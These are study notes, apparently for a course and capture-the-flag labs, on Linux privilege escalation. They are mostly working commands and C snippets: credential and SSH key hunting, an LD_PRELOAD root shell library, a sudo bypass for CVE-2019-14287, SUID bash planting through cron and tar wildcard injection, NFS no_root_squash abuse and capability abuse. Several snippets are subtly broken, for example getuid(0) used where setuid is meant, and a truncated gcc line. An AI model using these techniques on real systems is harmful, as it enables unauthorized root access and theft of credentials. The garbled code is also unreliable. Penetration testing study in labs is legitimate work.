Linux Privilege Escalation

Resources:

1. Basic Linux Privilege Escalation - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

2. Linux Privilege Escalation - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md

3. Checklist - Linux Privilege Escalation - https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist

4. Sushant 747's Guide (Country dependant - may need VPN) - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

5. All links and resources found in the course can also be found at the following repository: https://github.com/Gr1mmie/Linux-Privilege-Escalation-Resources

6. Walkthrough- https://0xsmiley.github.io/2020-07-26-LinuxPrivEsc/

Initial Enumeration

#System Enumeration
hostname
uname -a
cat /proc/version
cat /etc/issue
lscpu
ps aux        #sevices running
ps aux | grep root
sudo -V

#User Enumeration
whoami
id
sudo -l
cat /etc/sudoers
cat /etc/passwd
cat /etc/passwd | cut -d : -f 1
cat /etc/shadow
history

#Network Enumeration
ifconfig
ip a
ip route
ip neigh    #To view arp table
netstat -ano

#Password Hunting
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
locate password | more
locate pass | more
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null

Exploring Automated Tools

#LinPeas - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
#LinEnum - https://github.com/rebootuser/LinEnum
#Linux Exploit Suggester - https://github.com/mzet-/linux-exploit-suggester
#Linux Priv Checker - https://github.com/sleventyeleven/linuxprivchecker
#Downlaod linpeas and run it
./linpeas.sh
#Downlaod Linux Exploit Suggester and run it
./linux-exploit-suggester.sh

Kernel Exploits

#Kernel Exploits - https://github.com/lucyoa/kernel-exploits
uname -a
#search kenal exploit related to the result we got
#then run the exploit, if needed compile the code

Passwords & File Permissions

#Escalation via Stored Passwords
history    #we may have password or good comamnds
cat .bash_history
su root
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
#Downlaod linpeas and run it
./linpeas.sh
#check the files that are infront of us :)

#Escalation via Weak File Permissions
ls -la /etc/passwd
ls -la /etc/shadow
#Here we can passwords, refer to password cracking section

#Escalation via SSH Keys
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
#Generating ssh keys
ssh-keygen -t rsa
#From here we can try put public keys in authorized_keys file and try to connect with private key (very rare case)
#If we got any private key we can directly connect
#connecting via ssh private key
chmod 600 <Private_key>
ssh -i <priate_key> <username>@<ip_address>
#Note: public keys stored in authorized_keys file 

Sudo

#Escalation via Sudo Shell Escaping
#GTFOBins - https://gtfobins.github.io/
#Linux PrivEsc Playground - https://tryhackme.com/room/privescplayground
sudo -l
#By using GTFO bin we can get shell

#Escalation via Intended Functionality
sudo -l
#just google the service privilege escalation we need
#wget example - https://veteransec.com/2018/09/29/hack-the-box-sunday-walkthrough/

#Escalation via LD_PRELOAD
sudo -l
#Write a shell
nano shell.c
#Code goes here
#now compile the code
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
#now the file
sudo LD_PRELOAD=/home/usr/shell.so <any_sudo_command>     #sudo LD_PRELOAD=/home/usr/shell.so vim

#Simple CTF TryHackMe Walkthrough
#https://www.hackingarticles.in/simple-ctf-tryhackme-walkthrough/
#dirsearch - https://github.com/maurosoria/dirsearch
#Exploit-DB for Simple CMS - https://www.exploit-db.com/exploits/46635

#CVE-2019-14287 
#Exploit-DB for CVE-2019-14287 - https://www.exploit-db.com/exploits/47502
#Sudo Security Bypass [TryHackMe]
#https://martinkubecka.github.io/posts/thm/sudo-security-bypass/
#you may see like this: "hacker ALL=(ALL,!root) /bin/bash"
#you can by pass using below command
sudo -u#-1 /bin/bash

#CVE-2019-18634
#Exploit for CVE-2019-18634 - https://github.com/saleemrashid/sudo-cve-2019-18634
#TryHackMe: Sudo Buffer Overflow Walkthrough
#https://r4v4n.medium.com/tryhackme-sudo-buffer-overflow-walkthrough-14e7f5a2a0c7
sudo -V
#now try the exploit if version you got is vulnerable

//Code as follows shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    getuid(0);
    system("/bin/bash");
}

SUID

#SUID
find / -perm -u=s -type f 2>/dev/null
#from the result check the permissions
ls -la <command_you_got>        #EX: ls -la /usr/bin/chsh
#Now we can use GTFO bins to exploit
#https://gtfobins.github.io/#+suid
#Write -Up 06-TryHackMe-Vulnversity
#https://infosecwriteups.com/write-up-06-tryhackme-vulnversity-9b5f8e365be8

Other SUID Escalation

#Escalation via Shared Object Injection
find / -type f -perm -04000 -ls 2>/dev/null
#from the result check the permissions
ls -la <command_you_got>        #EX: ls -la /usr/bin/chsh
#check the result by running commands you got
<command_you_got>      #EX: /usr/bin/chsh
#we trace the results by using strace tool
strace <command_you_got> 2>&1     #EX: strace /usr/bin/chsh 2>&1 
strace <command_you_got> 2>&1 | grep -i -E "open|access|no such file"
#we may get files that file not found, we can replace that file with malitious script and escalate privileges
#code goes here
#now we will compile the code
gcc -shared -fPIC -o /home/user
#now place the file in the path we got previously
#now the command we got then we may have root

#Escalation via Binary Symlinks
#This vulnerability is with nginx < 1.6.2 and "S" bit in sudo as well
#Nginx Exploit - https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#from expoit suggester you may get nginx exploit as well
dpkg -l | grep nginx
find / -type f -perm -04000 -ls 2>/dev/null
ls -la /var/log/nginx
#now downlaod and run the nginx exploit
./nginxed-root.sh /var/log/nginx/error.log
#now make a another connection to the server
ssh <username>@<ip_address>
invoke-rc.d nginx rotate >/dev/null 2>&1
#we will get shell in previous shell

#Escalation via Environmental Variables (watch the video for better clarity)
env
find / -type f -perm -04000 -ls 2>/dev/null
#run any env commands we got from above command
#Also run string for that command
strings <command_we_got>
print $PATH
#now we will make a new malitious service
echo 'int main() { setgid(0); getuid(0); system("/bin/bash"); return 0;}' > /tmp/service.v
gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH
print $PATH
#Now run the command we got previously

//Code goes here
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

Void inject(){
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Capabilities

#Linux Privilege Escalation using Capabilities - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
#SUID vs Capabilities - https://mn3m.info/posts/suid-vs-capabilities/
#Linux Capabilities Privilege Escalation - https://medium.com/@int0x33/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
getcap -r / 2>/dev/null
#here "ep" is like everything
#Escalation via Capabilities
<command_we_got> -c 'import os; os.setgid(0); os.system("/bin/bash")'     #/usr/bin/python2.6 -c 'import os; os.setgid(0); os.system("/bin/bash")'

Scheduled Tasks

#Cron & Timers
cat /etc/crontab
#https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md

#Escalation via Cron Paths
cat /etc/crontab
#we can make or modify files that are running regularly with the below code and we will get root shell
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /<filename>
chmod +x /<filename>
#check the /tmp/bash over written or not
ls -la /tmp
#once over written run below command
/tmp/bash -p
id
whoami

#Escalation via Cron Wildcards(you can watch video for better understanding)
cat /etc/crontab
#if we find anything running wih "tar *" we can use this
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > runme.sh
chmod +x runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\runme.sh    #touch /home/user/--checkpoint-action=exec=sh\ runme.sh
/tmp/bash -p
id
whoami

#Escalation via Cron File Overwrites
#overwrite the file file using below command
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /<filename>
#check the /tmp/bash over written or not
ls -la /tmp
#once over written run below command
/tmp/bash -p
id
whoami

#TryHackMe-CMesS Walkthrough
#https://sparshjazz.medium.com/tryhackme-cmess-walk-240847b44f31

NFS Root Squashing

#Escalation via NFS Root Squashing
cat /etc/exports
#We can see no_Root_Squash, we can use this to mount a folder to victim
#run below commands in attacker machine
showmount -o <victim_ip>
mkdir /tmp/mountme
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mountme
echo 'int main() { setgid(0); getuid(0); system("/bin/bash"); return 0;}' > /tmp/mountme/x.c
gcc /tmp/mountme/x.c -o /tmp/mountme/x
chmod +x /tmp/mountme/x
#Run belwo commands in victim machine
cd /tmp
./x
#we will get shell

Docker

#UltraTech TryHackMe Walkthrough
#https://www.hackingarticles.in/ultratech-tryhackme-walkthrough/